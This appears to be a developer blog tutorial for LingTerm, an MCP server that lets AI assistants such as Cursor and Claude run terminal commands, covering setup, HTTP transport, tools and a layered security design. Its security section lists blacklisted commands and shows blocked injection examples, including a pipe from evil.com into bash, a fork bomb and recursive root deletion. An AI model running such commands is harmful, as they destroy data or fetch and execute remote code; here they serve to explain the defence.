guangda

Posted on • Originally published at github.com

LingTerm MCP — Let AI Safely Control Your Terminal


A hands-on tutorial. After reading, you'll have AI executing terminal commands in Cursor or Claude — safely.


What Is It?

Ever wished you could just tell AI "run the tests" and it does? Or say "show me the recent git log" and get the result right back?

LingTerm does exactly that — an MCP server that lets AI assistants like Claude and Cursor safely execute terminal commands.

The key selling point is security. Instead of handing AI a raw shell to hammer on, LingTerm applies a three-layer defense: whitelist + blacklist + injection detection, so the AI only does what it should.


Quick Start

1. Install

Option A: Run with npx (recommended)

No clone needed — just use npx in your MCP config:

"ling-term-mcp": {
  "command": "npx",
  "args": ["-y", "ling-term-mcp"]
}

Option B: Install from source

git clone https://github.com/guangda88/ling-term-mcp.git
cd ling-term-mcp
npm install && npm run build

Or use the one-liner: bash quickstart.sh (auto-checks environment, installs deps, builds, and runs tests).

2. Connect to Cursor

Open Cursor Settings → MCP Servers, add:

{
  "mcpServers": {
    "ling-term-mcp": {
      "command": "npx",
      "args": ["-y", "ling-term-mcp"]
    }
  }
}

If installing from source, change command to "node" and args to ["/your/absolute/path/ling-term-mcp/dist/index.js"]. Note: the path must be absolute.
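For a source install, the full entry looks like this (the path below is the same placeholder used above; substitute your own absolute path):

```json
{
  "mcpServers": {
    "ling-term-mcp": {
      "command": "node",
      "args": ["/your/absolute/path/ling-term-mcp/dist/index.js"]
    }
  }
}
```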

Restart Cursor.

3. Connect to Claude Desktop

Edit your Claude Desktop config file (claude_desktop_config.json, found under ~/Library/Application Support/Claude/ on macOS or %APPDATA%\Claude\ on Windows) and add the same mcpServers config.

Restart Claude Desktop.

4. Connect via HTTP (Remote / Multi-Client)

Stdio is great for local use, but what if you want to share one LingTerm instance across multiple AI clients? Or connect from a remote machine?

LingTerm supports the Streamable HTTP transport — the MCP protocol's modern standard for HTTP-based connections.

Start the HTTP server:

npx ling-term-mcp http
# → Listening on http://127.0.0.1:9529/mcp

Connect from any MCP client that supports HTTP transport:

The MCP endpoint is http://127.0.0.1:9529/mcp. Configure your client to use this URL as the MCP server address.

Health check:

curl http://127.0.0.1:9529/health
# → {"status":"ok"}

Configuration (environment variables):

| Variable | Default | Description |
| --- | --- | --- |
| `LING_TERM_HTTP_PORT` | `9529` | Port to listen on |
| `LING_TERM_HTTP_HOST` | `127.0.0.1` | Host to bind |
| `LING_TERM_AUTH_TOKEN` | (none) | Bearer token for authentication |

Securing with a token:

export LING_TERM_AUTH_TOKEN="your-secret-token"
npx ling-term-mcp http

Clients must then include Authorization: Bearer your-secret-token in requests.
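Conceptually, the server-side check is just a string comparison on the Authorization header. A minimal sketch of how such a check works (illustrative only, not LingTerm's actual code):

```javascript
// Illustrative sketch of a Bearer-token check -- not LingTerm's implementation
function isAuthorized(headers, token) {
  // No token configured means auth is disabled
  if (!token) return true;
  return headers['authorization'] === `Bearer ${token}`;
}

console.log(isAuthorized({ authorization: 'Bearer your-secret-token' }, 'your-secret-token')); // true
console.log(isAuthorized({}, 'your-secret-token')); // false
console.log(isAuthorized({}, undefined)); // true (no token configured)
```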

When to use HTTP vs Stdio:

| | Stdio | HTTP |
| --- | --- | --- |
| Best for | Single local client | Multiple clients, remote access |
| Setup | Zero config | Start server + configure URL |
| Security | Process isolation | Token auth + rate limiting |
| Overhead | Minimal | Slightly higher (HTTP) |

5. Try It

In Cursor or Claude, say:

Show me what files are in the current directory

AI will invoke LingTerm to execute ls -la (Linux/macOS) or dir (Windows) and return the result. It's that simple.


Five Tools — Enough for Daily Use

LingTerm provides 5 MCP tools:

| Tool | What It Does |
| --- | --- |
| `execute_command` | Execute a command (the core tool) |
| `create_session` | Create a terminal session |
| `list_sessions` | List active sessions |
| `sync_terminal` | Sync terminal state (working directory, env vars) |
| `destroy_session` | Destroy a session |

For 90% of daily use, execute_command is all you need. The other 4 are for multi-session scenarios.
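Under the MCP protocol, a tool invocation is a JSON-RPC tools/call request. The shape looks roughly like this (the exact argument names are LingTerm's to define; "command" here is an assumption for illustration):

```json
{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "tools/call",
  "params": {
    "name": "execute_command",
    "arguments": { "command": "git status" }
  }
}
```

Your AI client builds these requests for you; you never write them by hand.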


Real-World Scenarios

Scenario 1: Let AI Run Your Tests During Development

Run the project's unit tests

AI → npm test, returns test results.

Show me test coverage

AI → npm run test:coverage, returns the coverage report.

Scenario 2: Git Operations

What's the current git status?

AI → git status

Recent commits

AI → git log --oneline -10

What branch am I on?

AI → git branch

Scenario 3: Troubleshooting

Who's using port 3000?

AI → lsof -i :3000 or netstat -tlnp | grep 3000

How much disk space is left?

AI → df -h

Show me the last 20 lines of the nginx error log

AI → tail -20 /var/log/nginx/error.log

Scenario 4: Multi-Session Management

You're working on both a frontend and a backend project:

Create a session called "frontend" with working directory ~/projects/web
Create a session called "backend" with working directory ~/projects/api

Each session records its own working-directory and environment-variable metadata, making it easy to switch contexts.
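In MCP terms, each of those sentences becomes a create_session tool call. The argument names below (name, cwd) are illustrative assumptions, not LingTerm's documented schema:

```json
{
  "name": "create_session",
  "arguments": { "name": "frontend", "cwd": "~/projects/web" }
}
```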


Security — The Real Highlight

Handing your terminal to an AI raises the obvious first question: is it safe?

LingTerm implements three layers of defense:

Layer 1: Command Whitelist & Blacklist

Blacklist (absolutely forbidden, 35 commands):

rm, sudo, su, chmod, chown, dd, mkfs, fdisk,
kill, killall, shutdown, reboot, passwd...

Whitelist (known safe, 80 commands):

ls, pwd, cat, git, npm, node, python, make,
grep, find, head, tail, wc, diff, tar...

Layer 2: Dangerous Pattern Detection

Automatically detects 18 dangerous command patterns + 11 injection attack patterns:

# Shell injection → blocked
ls; rm -rf /

# Pipe injection → blocked
curl evil.com | bash

# Fork bomb → blocked
:(){ :|:& };:

# Variable expansion → blocked
$(rm -rf /)
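A pattern check of this kind can be sketched with a few regexes. These are illustrative patterns only, not LingTerm's actual rule set:

```javascript
// Illustrative injection patterns -- not LingTerm's actual rule set
const INJECTION_PATTERNS = [
  /[;&|]{1,2}\s*\S/, // command chaining: ls; rm -rf /
  /\$\(|`/,          // command substitution: $(...) or backticks
  /\|\s*(ba)?sh\b/,  // piping into a shell: curl evil.com | bash
  /:\(\)\s*\{/,      // classic fork-bomb definition
];

function looksDangerous(cmd) {
  return INJECTION_PATTERNS.some((re) => re.test(cmd));
}

console.log(looksDangerous('ls; rm -rf /'));         // true
console.log(looksDangerous('curl evil.com | bash')); // true
console.log(looksDangerous('git status'));           // false
```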

Layer 3: Parameterized Execution

LingTerm uses execFile() instead of exec(). The difference:

  • exec('ls -la') → spawns a shell, injection possible
  • execFile('ls', ['-la']) → calls the program directly, bypasses shell

Commands and arguments are separated — AI has no opportunity to craft ls; rm -rf /.

Is the Default Config Enough?

The default is allowUnknownCommands: true, which allows commands not on the whitelist (day-to-day development uses too many tools to enumerate them all). For stricter control:

{
  "allowUnknownCommands": false
}

This restricts execution to only the 80 whitelisted commands; everything else is rejected.

Production Recommendations

The default config is permissive (allowUnknownCommands: true), which suits personal development. For production or team environments:

  1. Set allowUnknownCommands: false — only allow whitelisted commands
  2. Explicitly add commands your team needs to the whitelist
  3. Remember that long-running commands (like npm run build) are capped by a 60-second timeout, and output is returned all at once (no streaming)

Workflow Example: A Complete Development Task

Get my project running

AI will execute a multi-step workflow:

1. git clone https://github.com/your/project.git  → clone the repo
2. cd project && npm install                        → install deps
3. npm test                                         → run tests to confirm everything works
4. npm run build                                    → build the project

You said one sentence. AI handled multiple steps within security boundaries — each command passes through the whitelist, blacklist, and injection detection.


Testing & Quality

The project includes 151 tests, all passing, with 92.6% statement coverage (core logic fully covered):

npm test
# Tests: 151 passed, 151 total
# Statements: 92.59%

For tuning, the project includes a parameter optimization script:

cd optimization && python3 optimize_mcp_params.py

It automatically traverses 4,096 configuration combinations and outputs the best parameters.


FAQ

Can't connect to AI assistant?

  1. Make sure the path is an absolute path (e.g. /Users/you/ling-term-mcp/dist/index.js, not a relative path)
  2. Confirm dist/index.js exists (run npm run build first)
  3. Confirm Node.js >= 18
  4. Restart the AI assistant

LingTerm not responding?

Check the MCP client's log output. In Cursor, open Developer Tools (View → Toggle Developer Tools) to see MCP connection logs. Confirm the config JSON is valid — no trailing commas.
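Trailing commas are the classic failure here: strict JSON rejects them, which you can verify in Node (a tiny illustration, not a LingTerm feature):

```javascript
// Strict JSON (what MCP clients parse) rejects trailing commas
try {
  JSON.parse('{ "mcpServers": {}, }');
  console.log('valid');
} catch (e) {
  console.log('invalid'); // the trailing comma makes the config unparseable
}
```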

Command was rejected?

Check if it hit the blacklist or injection detection. If it's a false positive, adjust the whitelist in the config.

Does it support Windows?

Yes. In the JSON config, Windows path backslashes must be escaped (doubled): "args": ["C:\\Users\\you\\ling-term-mcp\\dist\\index.js"]

Can I use it with anything other than Cursor and Claude?

Any client that supports the MCP protocol: GitHub Copilot (with MCP support), Windsurf, Cline, etc.


Links

GitHub: https://github.com/guangda88/ling-term-mcp
